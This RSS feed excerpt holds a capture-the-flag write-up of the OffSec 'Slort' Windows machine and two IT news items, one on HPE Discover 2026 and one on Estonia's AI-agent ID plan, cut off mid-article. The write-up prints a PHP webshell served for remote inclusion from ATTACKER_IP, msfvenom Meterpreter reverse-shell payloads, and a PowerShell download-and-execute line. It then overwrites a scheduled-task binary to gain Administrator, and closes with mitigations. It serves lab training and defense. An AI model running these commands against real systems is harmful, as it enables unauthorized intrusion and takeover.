<content:encoded><![CDATA[<h3>Slort — RFI via PHP allow_url_include + Writable Scheduled Task Binary to Administrator | OffSec PG Play</h3><p>Slort is a Windows machine that chains a PHP remote file inclusion vulnerability with a world-writable scheduled task binary to deliver a full Administrator session. The web server on port 8080 runs an XAMPP stack hosting a custom PHP application that passes the ?page= GET parameter directly into include() it with no sanitisation. With allow_url_include enabled — a dangerous PHP setting common in old XAMPP installations — pointing the parameter at an attacker-controlled URL causes the server to fetch and execute arbitrary PHP. That gets a Meterpreter shell as rupert. From there, standard automated enumeration turns up nothing. Manual filesystem exploration finds the answer: C:\Backup\info.txt documents a scheduled task invoked TFTP.EXE on a five-minute interval as Administrator. icacls confirms every authenticated user has full control over the binary. Replace it with a Meterpreter payload and wait for the scheduler to complete the chain.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*cFOBI7_c-J62tSPE1njH_g.png"></figure><p><strong>Attack Path:</strong> ffuf → /site/index.php?page= (RFI via allow_url_include) → Meterpreter as rupert → C:\Backup\TFTP.EXE (world-writable, scheduled as Administrator) → Meterpreter as SLORT\Administrator</p><p><strong>Platform:</strong> OffSec Proving Grounds Play<br> <strong>Machine:</strong> Slort<br> <strong>Difficulty:</strong> Intermediate<br> <strong>OS:</strong> Windows<br> <strong>Date:</strong> 20XX-XX-XX</p><h3>Table of Contents</h3><pre>1. Reconnaissance<br>   1.1  Nmap Port Scan — Fast Pass<br>   1.2  Nmap Port Scan — Full Range<br>   1.3  Dead-End Service Checks (FTP, SMB, MariaDB)<br>2. Web Enumeration<br>   2.1  Directory Busting — Port 8080<br>   2.2  Enumerating /site/<br>   2.3  Identifying the File Inclusion Parameter<br>3. Initial Access — RFI via PHP allow_url_include<br>   3.1  Confirming LFI via Path Traversal<br>   3.2  Confirming RFI and Deploying a PHP Webshell<br>   3.3  Upgrading to an Interactive Meterpreter Session<br>4. Post-Exploitation Enumeration<br>   4.1  Token Privileges<br>   4.2  Group Membership<br>   4.3  Auto-Starting Services<br>   4.4  Scheduled Tasks<br>   4.5  Registry Run Keys<br>   4.6  Manual Filesystem Exploration — C:\Backup<br>5. Privilege Escalation — Writable Scheduled Task Binary<br>   5.1  Confirming Write Access with icacls<br>   5.2  Generating the Replacement Payload<br>   5.3  Overwriting TFTP.EXE<br>   5.4  Catching the Administrator Session<br>6. Proof of Compromise<br>7. Vulnerability Summary<br>8. Defense &amp; Mitigation<br>   8.1  Remote File Inclusion — PHP allow_url_include Enabled<br>   8.2  User Input Passed to include() Without Sanitisation<br>   8.3  World-Writable Scheduled Task Binary</pre><h3>1. Reconnaissance</h3><h3>1.1 Nmap Port Scan — Fast Pass</h3><pre>nmap -Pn -sC -sV -F &lt;TARGET_IP&gt;</pre><p><strong>Results:</strong></p><pre>Port      State  Service   Version<br>--------  -----  --------  -------------------------------------------------<br>21/tcp    open   FTP       FileZilla 0.9.41 beta<br>135/tcp   open   msrpc     Microsoft Windows RPC<br>139/tcp   open   netbios   Microsoft Windows netbios-ssn<br>445/tcp   open   SMB       Microsoft Windows SMB (signing not required)<br>3306/tcp  open   mysql     MariaDB — unauthorized (local connections only)<br>8080/tcp  open   HTTP      Apache 2.4.43, PHP 7.4.6, OpenSSL 1.1.1g (Win64 XAMPP)</pre><p>The port 8080 finding is the most significant. XAMPP is a self-contained PHP development stack — the combination of Apache, PHP, MySQL, and sometimes phpMyAdmin — and old versions are known to ship with dangerous default settings, such as allow_url_include enabled. MariaDB is reachable on 3306, but the banner says "host not allowed", meaning it is accepting local connections only. SMB message signing is not required, which is noted for completeness. FTP is running a very old FileZilla beta — worth probing for anonymous login before moving on.</p><h3>1.2 Nmap Port Scan — Full Range</h3><pre>nmap -Pn -p- --min-rate 5000 &lt;TARGET_IP&gt;</pre><p><strong>Additional ports found:</strong></p><pre>49665/tcp  open  msrpc<br>49666/tcp  open  msrpc</pre><p>Both are ephemeral Windows RPC ports assigned dynamically at startup. They provide no additional attack surface here. The full scan confirms that the fast pass covered the meaningful services.</p><h3>1.3 Dead-End Service Checks</h3><p>Three quick checks before committing to the web server:</p><pre>ftp &lt;TARGET_IP&gt;<br># Username: anonymous<br># Password: anonymous</pre><p>Anonymous FTP login was rejected. FileZilla 0.9.41 beta is an old version, but anonymous access was not enabled on this instance.</p><pre>smbclient -L //&lt;TARGET_IP&gt; -N</pre><pre>NT_STATUS_ACCESS_DENIED</pre><p>Null session authentication is blocked. No SMB shares are enumerable without credentials.</p><pre>mysql -h &lt;TARGET_IP&gt; -u root --password=''</pre><p>Connection refused — MariaDB is bound to localhost only, consistent with the Nmap banner. XAMPP’s default MariaDB configuration does not expose the database externally, and that default was not changed here.</p><p>All three dead ends confirmed in under two minutes. Port 8080 is the target.</p><h3>2. Web Enumeration</h3><h3>2.1 Directory Busting — Port 8080</h3><pre>ffuf -u http://&lt;TARGET_IP&gt;:8080/FUZZ \<br>     -w /usr/share/seclists/Discovery/Web-Content/common.txt \<br>     -mc 200,301,302,403 -t 40</pre><p><strong>Results:</strong></p><pre>Path          Status  Notes<br>-----------   ------  ----------------------------------------<br>/site         301     Custom application<br>/phpmyadmin   403     Installed but access restricted<br>/dashboard    301     Default XAMPP dashboard</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/988/1*A00HueMeJfRO72kWjG5VJA.png"></figure><p>/site/ is the non-standard result. phpMyAdmin is present and blocked from external access — a useful note if credentials surface later. The XAMPP dashboard is the default content. Everything that matters is in /site/.</p><h3>2.2 Enumerating /site/</h3><pre>ffuf -u http://&lt;TARGET_IP&gt;:8080/site/FUZZ \<br>     -w /usr/share/seclists/Discovery/Web-Content/common.txt \<br>     -mc 200,301,302,403 -t 40</pre><p><strong>Results:</strong></p><pre>Path        Status  Size   Notes<br>----------  ------  -----  ------------------------------------------<br>admin.php   200     3998   Present<br>controllers 200     984    Application MVC structure<br>css         301     —      Static assets<br>fonts       301     —      Static assets<br>images      301     —      Static assets<br>index.php   301     27     Tiny body — redirect script<br>js          301     —      Static assets</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/919/1*yqYhMYXjCEv4psp5eszy9g.png"></figure><p>index.php returning a 301 with only 27 bytes in the response body is the key finding. That response size is consistent with a PHP script containing nothing but a header("Location: ...") redirect — the entire file is a single redirect, and it is almost certainly redirecting to itself with a ?page= parameter appended. That is the classic signature of a file inclusion handler.</p><h3>2.3 Identifying the File Inclusion Parameter</h3><pre>curl -I http://&lt;TARGET_IP&gt;:8080/site/index.php</pre><p><strong>Response header:</strong></p><pre>HTTP/1.1 301 Moved Permanently<br>Location: index.php?page=main.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/830/1*rbGwMu5xXqNP57_HpxpBSA.png"></figure><p>Confirmed. The application uses ?page= to determine which PHP file to include. The redirect destination is main.php, meaning the application's logic is to include whatever file is named in the page parameter. If that parameter is passed unsanitised into PHP's include(), it is a file inclusion vulnerability. The next step is confirming how far it can be pushed.</p><h3>3. Initial Access — RFI via PHP allow_url_include</h3><h3>3.1 Confirming LFI via Path Traversal</h3><pre>curl "http://&lt;TARGET_IP&gt;:8080/site/index.php?page=../../../../windows/system32/drivers/etc/hosts"</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/918/1*afnt8HGDVvqAaOwZaahBMw.png"></figure><p><strong>Output:</strong> The Windows hosts file content was returned verbatim in the response body.</p><p>LFI is confirmed. The application passes $_GET['page'] directly into include() with no path restriction and no input sanitisation. The web root sits at C:\xampp\htdocs\site\, so four levels of ../ traversal climb to the filesystem root, and the hosts file path resolves cleanly from there.</p><p>LFI alone enables arbitrary file reads — configuration files, credential stores, source code. The more powerful technique is RFI: if PHP’s allow_url_include directive is enabled, include() can fetch and execute code from a remote URL entirely under attacker control.</p><h3>3.2 Confirming RFI and Deploying a PHP Webshell</h3><p>Create a minimal PHP webshell locally:</p><pre>echo '&lt;?php system($_GET["cmd"]); ?&gt;' &gt; ~/cmd.php</pre><p>Serve it over HTTP from the attacker's machine:</p><pre>python3 -m http.server 8000</pre><p>Trigger remote inclusion and confirm RCE:</p><pre>curl "http://&lt;TARGET_IP&gt;:8080/site/index.php?page=http://&lt;ATTACKER_IP&gt;:8000/cmd.php&amp;cmd=whoami"</pre><p><strong>Output:</strong></p><pre>slort\rupert</pre><p>RFI confirmed. allow_url_include is enabled on this XAMPP installation. PHP fetched cmd.php from the attacker's machine, executed it as server-side code, and ran whoami via system(), and returned the result. Remote code execution as rupert is established.</p><blockquote><em>💡 </em><em>allow_url_include was deprecated in PHP 7.4 and removed in PHP 8.0. Its presence here on PHP 7.4.6 confirms this is an unmaintained, default XAMPP installation where the dangerous default was never corrected.</em></blockquote><h3>3.3 Upgrading to an Interactive Meterpreter Session</h3><p>A webshell requires a separate HTTP request for every command and leaves a log entry for every action. An interactive reverse shell provides a persistent, stateful terminal session.</p><p>Generate a stageless Windows Meterpreter payload:</p><pre>msfvenom -p windows/x64/meterpreter_reverse_tcp \<br>     LHOST=&lt;ATTACKER_IP&gt; LPORT=4444 \<br>     -f exe -o shell.exe</pre><p>A <strong>stageless</strong> payload (meterpreter_reverse_tcp) embeds the full Meterpreter agent in a single executable. A <strong>staged</strong> payload (meterpreter/reverse_tcp) sends a small stager first, which then downloads the agent in a second connection. Stageless is more reliable — one connection, full functionality from the moment it lands. If the second connection of a staged payload is interrupted by a firewall or timing issue, the session is lost.</p><p>Serve the payload and set up the Metasploit handler:</p><pre># Metasploit handler<br>use exploit/multi/handler<br>set payload windows/x64/meterpreter_reverse_tcp<br>set LHOST &lt;ATTACKER_IP&gt;<br>set LPORT 4444<br>run</pre><p>Deliver the payload via the webshell using a base64-encoded PowerShell command. Base64 encoding the entire PowerShell command with -enc sidesteps character escaping issues that arise when special characters — quotes, semicolons, dollar signs, pipes — must survive intact through URL encoding, PHP's system(), and PowerShell's own parser. A single base64 token collapses all of that complexity.</p><pre># Generate the base64-encoded download-and-execute command<br>powershell -c "IEX((New-Object Net.WebClient).DownloadString('http://&lt;ATTACKER_IP&gt;:8000/shell.exe'))"<br># Base64-encode the above in UTF-16LE for PowerShell -enc</pre><p>Trigger via the webshell:</p><pre>curl "http://&lt;TARGET_IP&gt;:8080/site/index.php?page=http://&lt;ATTACKER_IP&gt;:8000/cmd.php&amp;cmd=powershell+-enc+&lt;BASE64_PAYLOAD&gt;"</pre><p><strong>Meterpreter session received:</strong></p><pre>meterpreter &gt; getuid<br>Server username: SLORT\rupert</pre><p>Interactive session as rupert. Standard post-exploitation enumeration follows.</p><h3>4. Post-Exploitation Enumeration</h3><h3>4.1 Token Privileges</h3><pre>whoami /priv</pre><p>Only default low-privilege user rights are present. There is no SeImpersonatePrivilege, SeDebugPrivilege, or SeBackupPrivilege. The fast paths — PrintSpoofer, GodPotato, or token impersonation attacks — are not available here.</p><h3>4.2 Group Membership</h3><pre>whoami /groups</pre><p>rupert is a member of the standard user groups only: Everyone, Users, and Authenticated Users. No Administrators, Backup Operators, Remote Management Users, or Remote Desktop Users membership. No group-based escalation path.</p><h3>4.3 Auto-Starting Services</h3><pre>wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"</pre><p>Only VMware Tools services returned, all with properly quoted executable paths. No unquoted service path vulnerabilities, and no third-party service binaries to check for weak ACLs.</p><h3>4.4 Scheduled Tasks</h3><pre>schtasks /query /fo LIST /v | findstr /i "task name\|run as\|status"</pre><p>Only standard Windows system maintenance tasks. No custom tasks with writable executables or elevated execution contexts visible through automated enumeration.</p><h3>4.5 Registry Run Keys</h3><pre>reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run<br>reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><p>Only VMware Tools and Windows Security Health entries in both keys. No custom or administrator-added run key entries.</p><h3>4.6 Manual Filesystem Exploration — C:\Backup</h3><p>Automated enumeration produced nothing. Manual exploration of non-standard directories is the next step — anything outside C:\Windows\ and C:\Program Files\ that an administrator created deliberately is worth reading.</p><pre>dir C:\Backup</pre><pre>TFTP.EXE<br>info.txt</pre><pre>type C:\Backup\info.txt</pre><p><strong>Output:</strong></p><pre>Run every 5 minutes:<br>C:\Backup\TFTP.EXE -i &lt;REMOTE_HOST&gt; get backup.txt</pre><p>A scheduled task invoking TFTP.EXE on a five-minute interval to pull a backup file from a remote host. Two questions determine whether this is exploitable: what account runs this task, and whether the binary is writable by rupert?</p><blockquote><em>💡 Automated scripts follow predefined patterns. </em><em>C:\Backup is not part of any default Windows installation — an administrator created it and placed files there deliberately. Non-standard directories created by administrators are consistently worth manual inspection.</em></blockquote><h3>5. Privilege Escalation — Writable Scheduled Task Binary</h3><h3>5.1 Confirming Write Access with icacls</h3><pre>icacls C:\Backup\TFTP.EXE</pre><p><strong>Output:</strong></p><pre>C:\Backup\TFTP.EXE  BUILTIN\Users:(I)(F)<br>                    NT AUTHORITY\SYSTEM:(I)(F)<br>                    BUILTIN\Administrators:(I)(F)</pre><p>BUILTIN\Users:(I)(F) — Every authenticated user on the system has inherited full control over this file. (F) means full control: read, write, execute, delete, and permission modification. (I) means the permission was inherited from the parent directory's ACL rather than set explicitly on the file itself. rupert is a member of BUILTIN\Users. The binary can be overwritten entirely.</p><p>The account that runs the scheduled task is Administrator. Replacing the binary with a Meterpreter payload means the next time the scheduler fires, it executes the payload as Administrator — a direct path to a privileged session.</p><h3>5.2 Generating the Replacement Payload</h3><pre>msfvenom -p windows/x64/meterpreter_reverse_tcp \<br>     LHOST=&lt;ATTACKER_IP&gt; LPORT=7777 \<br>     -f exe -o tftp.exe</pre><p>Port 7777 is used to keep this listener separate from the existing session on port 4444. The output file is named tftp.exe to match the original binary — while the filename does not affect execution, it keeps the operation clean and avoids any hypothetical filename-based integrity checks.</p><p>Set up a second Metasploit handler:</p><pre>use exploit/multi/handler<br>set payload windows/x64/meterpreter_reverse_tcp<br>set LHOST &lt;ATTACKER_IP&gt;<br>set LPORT 7777<br>run</pre><h3>5.3 Overwriting TFTP.EXE</h3><p>From the existing rupert Meterpreter session, download the payload directly to the target path using PowerShell's DownloadFile method:</p><pre>powershell -c "(New-Object Net.WebClient).DownloadFile('http://&lt;ATTACKER_IP&gt;:8000/tftp.exe','C:\Backup\TFTP.EXE')"</pre><p>DownloadFile writes the file to an exact specified path, making it more reliable than certutil for overwriting an existing binary at a known location.</p><p>The overwrite succeeds. The original TFTP.EXE was not locked by any running process — it executes briefly when the scheduler fires and exits immediately. With no active file lock, the binary can be replaced cleanly between scheduler invocations.</p><h3>5.4 Catching the Administrator Session</h3><p>Wait for the five-minute scheduled task cycle to complete. The scheduler invokes C:\Backup\TFTP.EXE under the Administrator account. The payload executes and connects back to the second Meterpreter handler.</p><p><strong>Session received:</strong></p><pre>meterpreter &gt; getuid<br>Server username: SLORT\Administrator</pre><p>Administrator.</p><h3>6. Proof of Compromise</h3><pre>meterpreter &gt; getuid<br>Server username: SLORT\Administrator</pre><h3>7. Vulnerability Summary</h3><pre>#   Vulnerability                                        Severity   Impact<br>--  ---------------------------------------------------  ---------  -----------------------------------------------<br>1   PHP allow_url_include enabled on XAMPP               Critical   Remote file inclusion enabling arbitrary RCE<br>2   User input passed to include() without sanitisation  Critical   LFI and RFI via ?page= parameter<br>3   TFTP.EXE world-writable by BUILTIN\Users             Critical   Scheduled task binary replaced — Admin session</pre><h3>8. Defense &amp; Mitigation</h3><h3>8.1 Remote File Inclusion — PHP allow_url_include Enabled</h3><p><strong>Root Cause:</strong> PHP’s allow_url_include directive was enabled in the XAMPP php.ini configuration. This setting permits include() and require() to accept full URLs as arguments, causing PHP to fetch and execute remote files as server-side code. Combined with unsanitised user input in the page parameter, this enabled complete remote code execution.</p><p><strong>Mitigations:</strong></p><ul><li><strong>Disable </strong><strong>allow_url_include immediately and permanently.</strong> There is no legitimate production use case for this setting that cannot be achieved safely through other means. Set it to Off in php.ini:</li></ul><pre>allow_url_include = Off</pre><ul><li>Restart Apache after the change:</li></ul><pre># Linux<br>  systemctl restart apache2<br>  # Windows (XAMPP)<br>  # Use the XAMPP Control Panel or: net stop Apache2.4 &amp;&amp; net start Apache2.4</pre><ul><li><strong>Disable </strong><strong>allow_url_fopen as well, where external URL fetching is not required.</strong> This setting controls whether PHP's file functions can open remote URLs at all. Disabling it eliminates the underlying network fetch capability:</li></ul><pre>allow_url_fopen = Off</pre><ul><li><strong>Keep PHP up to date.</strong> allow_url_include was deprecated in PHP 7.4 and removed entirely in PHP 8.0. Upgrading to a supported PHP 8.x release eliminates the setting as a risk entirely. Running PHP 7.4 on a XAMPP installation in a production or lab context is indefensible — it receives no security patches.</li><li><strong>Harden XAMPP for any network-accessible deployment.</strong> XAMPP is a development stack. Its default configuration — allow_url_include on, phpMyAdmin accessible, MariaDB with no root password — is intentionally permissive for local development. Any XAMPP instance reachable from a network should be hardened against these defaults before use.</li></ul><h3>8.2 User Input Passed to include() Without Sanitisation</h3><p><strong>Root Cause:</strong> The index.php application passed $_GET['page'] directly into PHP's include() function. Any value — a relative path, an absolute path, or a full URL — was accepted and executed without validation, restriction, or sanitisation.</p><p><strong>Mitigations:</strong></p><ul><li><strong>Never pass user-controlled input directly to </strong><strong>include(), </strong><strong>require(), or any file system function.</strong> This is a fundamental PHP security principle. If dynamic page loading is a genuine application requirement, it must be implemented through a strict allowlist — only known, pre-approved values should ever reach a file inclusion call:</li></ul><pre>$allowed_pages = [<br>      'home'  =&gt; 'home.php',<br>      'about' =&gt; 'about.php',<br>      'store' =&gt; 'store.php',<br>  ];<br>  $page = $allowed_pages[$_GET['page']] ?? 'home.php';<br>  include($page);</pre><ul><li>Any value not in the $allowed_pages array silently falls back to the default. An attacker passing a path traversal sequence or a remote URL receives the home page — nothing executes, nothing is disclosed.</li><li><strong>Set </strong><strong>open_basedir in </strong><strong>php.ini to restrict which directories PHP can access.</strong> Even if LFI is exploited, open_basedir confines file access to a specified directory tree and prevents reading files outside of it:</li></ul><pre>open_basedir = C:/xampp/htdocs/site/</pre><ul><li><strong>Conduct a source code review for all </strong><strong>include() and </strong><strong>require() calls.</strong> Every call to these functions in the codebase should be audited. Any that accepts external input without allowlist validation is a vulnerability. This is a straightforward static analysis task that should be part of any application security review.</li><li><strong>Use a Web Application Firewall as a compensating control.</strong> ModSecurity with the OWASP Core Rule Set detects path traversal sequences and remote URL patterns in parameters. It does not replace fixing the root cause, but it adds a meaningful detection and blocking layer.</li></ul><h3>8.3 World-Writable Scheduled Task Binary</h3><p><strong>Root Cause:</strong> C:\Backup\TFTP.EXE inherited (F) — full control — from the parent directory's ACL for BUILTIN\Users. Every authenticated user on the system could overwrite the binary. The scheduled task ran the binary as Administrator on a five-minute cycle. Any attacker with a low-privilege session could replace the binary and wait for the scheduler to provide an Administrator callback.</p><p><strong>Mitigations:</strong></p><ul><li><strong>Remove write permissions for </strong><strong>BUILTIN\Users from any executable invoked by a privileged scheduled task or service.</strong> The binary should be readable and executable by the account running the task, and writable only by Administrators or SYSTEM. Correct the ACL immediately:</li></ul><pre>icacls C:\Backup\TFTP.EXE /remove:g "BUILTIN\Users"<br>  icacls C:\Backup\TFTP.EXE /grant:r "BUILTIN\Users:(RX)"<br>  icacls C:\Backup\TFTP.EXE /grant:r "NT AUTHORITY\SYSTEM:(F)"<br>  icacls C:\Backup\TFTP.EXE /grant:r "BUILTIN\Administrators:(F)"</pre><ul><li><strong>Apply the principle of least privilege to all scheduled task executables and service binaries.</strong> The rule is simple: an account that does not need to modify a binary must not have write access to it, regardless of what inherited permissions the parent directory grants. Audit all scheduled tasks and services regularly:</li></ul><pre>icacls C:\Path\To\TaskExecutable.exe</pre><ul><li>Any result showing (F), (M), or (W) for BUILTIN\Users, Everyone, or Authenticated Users is a critical finding.</li><li><strong>Review the ACL of the parent directory, not just the binary.</strong> The inherited permissions here originated from C:\Backup\ itself. Fixing the directory ACL prevents future executables placed there from inheriting the same dangerous permissions:</li></ul><pre>icacls C:\Backup /inheritance:r<br>  icacls C:\Backup /grant:r "NT AUTHORITY\SYSTEM:(OI)(CI)(F)"<br>  icacls C:\Backup /grant:r "BUILTIN\Administrators:(OI)(CI)(F)"</pre><ul><li><strong>Store scheduled task executables in root-owned, permission-restricted directories.</strong> System utilities and automation scripts used by privileged tasks belong in C:\Windows\System32\, C:\Program Files\, or a custom directory with a deliberately hardened ACL — not in a general-purpose directory like C:\Backup\ where default permissions may be overly permissive.</li><li><strong>Log and alert on modifications to scheduled task executables.</strong> Windows Event ID 4663 (file accessed) and 4670 (permissions changed) can be monitored via Windows Security Auditing or a SIEM. Any write to an executable invoked by a privileged scheduled task should generate an immediate alert:</li></ul><pre>auditpol /set /subcategory:"File System" /success:enable /failure:enable</pre><ul><li><strong>Apply File Integrity Monitoring to critical executables.</strong> Tools such as OSSEC, Wazuh, or Tripwire can monitor specified files for modification and alert in real time. C:\Backup\TFTP.EXE being overwritten between scheduler invocations would have generated an immediate alert with FIM in place.</li></ul><p><em>OffSec PG Play — for educational purposes only.</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=ac72c40761ae" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/slort-rfi-via-php-allow-url-include-writable-scheduled-task-binary-to-administrator-offsec-pg-ac72c40761ae">Slort — RFI via PHP allow_url_include + Writable Scheduled Task Binary to Administrator | OffSec PG…</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[HPE CTO Russo drills into data, orchestration, and observability for the agentic enterprise]]></title>
<description><![CDATA[HPE CTO Fidelma Russo took to the main stage at HPE Discover 2026 in Las Vegas to detail a set of product announcements focused on governing data, orchestrating infrastructure, and operating AI agents in production. Where CEO Antonio Neri’s day-one keynote covered the portfolio architecture acros...]]></description>
<link>https://tsecurity.de/de/3606155/it-security-nachrichten/hpe-cto-russo-drills-into-data-orchestration-and-observability-for-the-agentic-enterprise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606155/it-security-nachrichten/hpe-cto-russo-drills-into-data-orchestration-and-observability-for-the-agentic-enterprise/</guid>
<pubDate>Wed, 17 Jun 2026 23:23:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>HPE CTO Fidelma Russo took to the main stage at HPE Discover 2026 in Las Vegas to detail a set of product announcements focused on governing data, orchestrating infrastructure, and operating AI agents in production. Where CEO Antonio Neri’s <a href="https://www.networkworld.com/article/4185952/hpe-discover-neri-outlines-an-ai-architecture-built-for-agents.html">day-one keynote</a> covered the portfolio architecture across networking, compute, and storage, Russo’s session went deeper on the software and operations layer that sits on top of that infrastructure.</p>



<p>Russo framed all of it around a single operational shift: Enterprises have moved from static workflows and human decision-making to distributed intelligence operating across fragmented infrastructure. The products she announced address what it takes to govern and operate that intelligence once it is in production. Key announcements include:</p>



<ul class="wp-block-list">
<li>HPE Data Fabric 8.2 with agent-aware capabilities</li>



<li>HPE Morpheus 9 with federated multi-site management and integrated software-defined networking</li>



<li>HPE OpsRamp Operations Copilot for AI factory observability</li>



<li>New partnership with ServiceNow connecting GreenLake Intelligence with autonomous service delivery </li>
</ul>



<p>“The question is no longer whether AI will transform the enterprise,” Russo said. “The question is, how do we make that transformation secure, governed, scalable, and operational?”</p>



<h2 class="wp-block-heading">Data Fabric as the trusted layer for AI</h2>



<p>Russo reiterated the now-familiar mantra that every AI strategy requires a data strategy, but argued that in an agentic world, data becomes part of the operational engine, not just an input. Agentic AI, she said, doesn’t simply retrieve information once, it continuously accesses data throughout the lifecycle of a task. That puts pressure on organizations to make data discoverable, governed, secured, and accessible wherever those agents operate. </p>



<p>To help solve that challenge, Russo announced HPE Data Fabric 8.2, with agent-aware capabilities; an enhanced global data catalog; and an appliance option aimed at simplifying deployment and reducing time-to-value.</p>



<p>“Before AI can act on that data, data must be discoverable, it must be governed, it must be secured, and it must be accessible wherever those agents operate,” Russo said.</p>



<h2 class="wp-block-heading">HPE Morpheus 9: Central control plane for hybrid and AI infrastructure</h2>



<p>Russo also used her keynote to announce HPE Morpheus 9. Part of the new HPE CloudOps Software Suite, Morpheus handles runtime orchestration and automation for traditional virtualization, container platforms, and AI workloads. </p>



<p>With version 9, HPE is introducing Morpheus Central, a federated multi-site management layer delivered as a GreenLake cloud service, with an air‑gapped on‑premises option. Morpheus Central provides a single operational view across multiple Morpheus deployments spanning data centers, regions, and cloud providers. From one console, operators can see:</p>



<ul class="wp-block-list">
<li>Fleet health (healthy, warning, and critical appliances)</li>



<li>Software currency and version drift across sites</li>



<li>Cost and license utilization for the entire estate </li>
</ul>



<p>Morpheus 9 also adds integrated software-defined networking (SDN) based on Juniper technology, bringing policy, security, and micro‑segmentation into the same platform. HPE is pitching these capabilities as transforming Morpheus from a provisioning tool into a true enterprise control plane for hybrid infrastructure, including AI workloads.</p>



<p>“This is our most advanced platform for operating modern and traditional infrastructure, as well as AI workloads,” Russo said.</p>



<h2 class="wp-block-heading">Distributed agentic enterprises</h2>



<p>HPE is extending its AI strategy beyond infrastructure into daily IT operations with an expansion of HPE GreenLake Intelligence, built around an agentic mesh and a growing family of copilots. At the core is a centralized agent registry and planning service that assigns identity, governance, and policy controls to AI agents, then coordinates which specialized agents should work together to deliver a requested outcome. </p>



<p>“Intelligence, which is usually trapped in products, has to move across and beyond individual products,” Russo said.</p>



<p>On top of this framework, HPE is rolling out multiple copilots aimed at making complex hybrid environments more manageable. A compute copilot is designed to help teams operate server infrastructure more intelligently, while a Morpheus orchestration copilot lets operators automate infrastructure using natural language. The flagship for observability is the OpsRamp Operations Copilot, which sits on GreenLake Intelligence and lets operators interact with their environment conversationally instead of hunting through dashboards, tickets, and logs. It uses frontier-scale models to reason across signals from infrastructure, applications, networks, AI services, and operations tools, surfacing related incidents, context, and recommended remediation in a single conversational view.</p>



<p>“Data powers intelligence, intelligence powers AI, and intelligence helps us operate it all,” Russo said. “We are now entering an era where people, systems, and agents are working together at a scale we’ve never seen before, and to do that successfully, organizations need three things: a trusted data layer, a platform for an agentic era, and intelligence embedded in day-to-day operations.”</p>



<h3 class="wp-block-heading">Read more from HPE Discover 2026</h3>



<ul class="wp-block-list">
<li><a href="https://www.networkworld.com/article/4185952/hpe-discover-neri-outlines-an-ai-architecture-built-for-agents.html">HPE CEO Neri outlines an AI architecture built for agents</a></li>



<li><a href="https://www.networkworld.com/article/4185763/hpe-product-barrage-targets-ai-networks-agents-management.html">HPE product barrage targets AI networks, agents, management</a></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Estonia plans government IDs giving AI agents rights and responsibilities]]></title>
<description><![CDATA[There’s no shortage of agentic AI tools out there that offer to perform online tasks on your behalf, if only you’ll give them all your passwords and credit card details. The trouble starts when those agents don’t know when to stop — or when others don’t know to stop them.



In Estonia, the count...]]></description>
<link>https://tsecurity.de/de/3605159/it-security-nachrichten/estonia-plans-government-ids-giving-ai-agents-rights-and-responsibilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605159/it-security-nachrichten/estonia-plans-government-ids-giving-ai-agents-rights-and-responsibilities/</guid>
<pubDate>Wed, 17 Jun 2026 16:54:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>There’s no shortage of agentic AI tools out there that offer to perform online tasks on your behalf, if only you’ll give them all your passwords and credit card details. The trouble starts when those agents don’t know when to stop — or when others don’t know to stop them.</p>



<p>In Estonia, the country’s AI Council has plans to change that, proposing to issue government-backed digital identities for AI agents that spell out what powers a person or company is willing to delegate to them.</p>



<p>“In the future, AI will increasingly perform digital operations on behalf of a person, company, or institution,” <a href="https://eesti.ai/uudised/eestist-saab-esimene-riik-maailmas-mis-loob-ai-agentidele-digitaalse-identiteedi#:~:text=%E2%80%9ETehisaru%20hakkab%20tulevikus%20inimese%2C%20ettev%C3%B5tte%20v%C3%B5i%20asutuse%20nimel%20%C3%BCha%20enam%20digitoiminguid%20tegema%20%E2%80%93%20koostama%20aruandeid%2C%20valmistama%20ette%20deklaratsioone%20v%C3%B5i%20suhtlema%20infos%C3%BCsteemidega.%20Selleks%20peab%20olema%20selge%2C%20kes%20tegutseb%2C%20kelle%20nimel%2C%20milliste%20%C3%B5igustega%20ja%20kes%20vastutab%2C%E2%80%9C%20%C3%BCtles%20Michal.">said Estonian Prime Minister Kristen Michal</a> in a news release. “To do this, it must be clear who is acting, on whose behalf, with what rights, and who is responsible.”</p>



<p>He supported the AI Council’s proposal to create a digital identity for AI agents that will define agents’ rights and enable them to act in a verifiable and auditable manner.</p>



<p>The ID could, the council suggests, show whether an agent is only allowed to view data, create or edit documents, or make payments, and if so, up to what limit.</p>



<h2 class="wp-block-heading">First mover advantage</h2>



<p>There’s no telling when the plan will come to fruition — although Michal is keen for his country to take the lead.</p>



<p>“If we act quickly and wisely, Estonia will become the first country in the world to create an official digital identity for AI agents,” he said.</p>



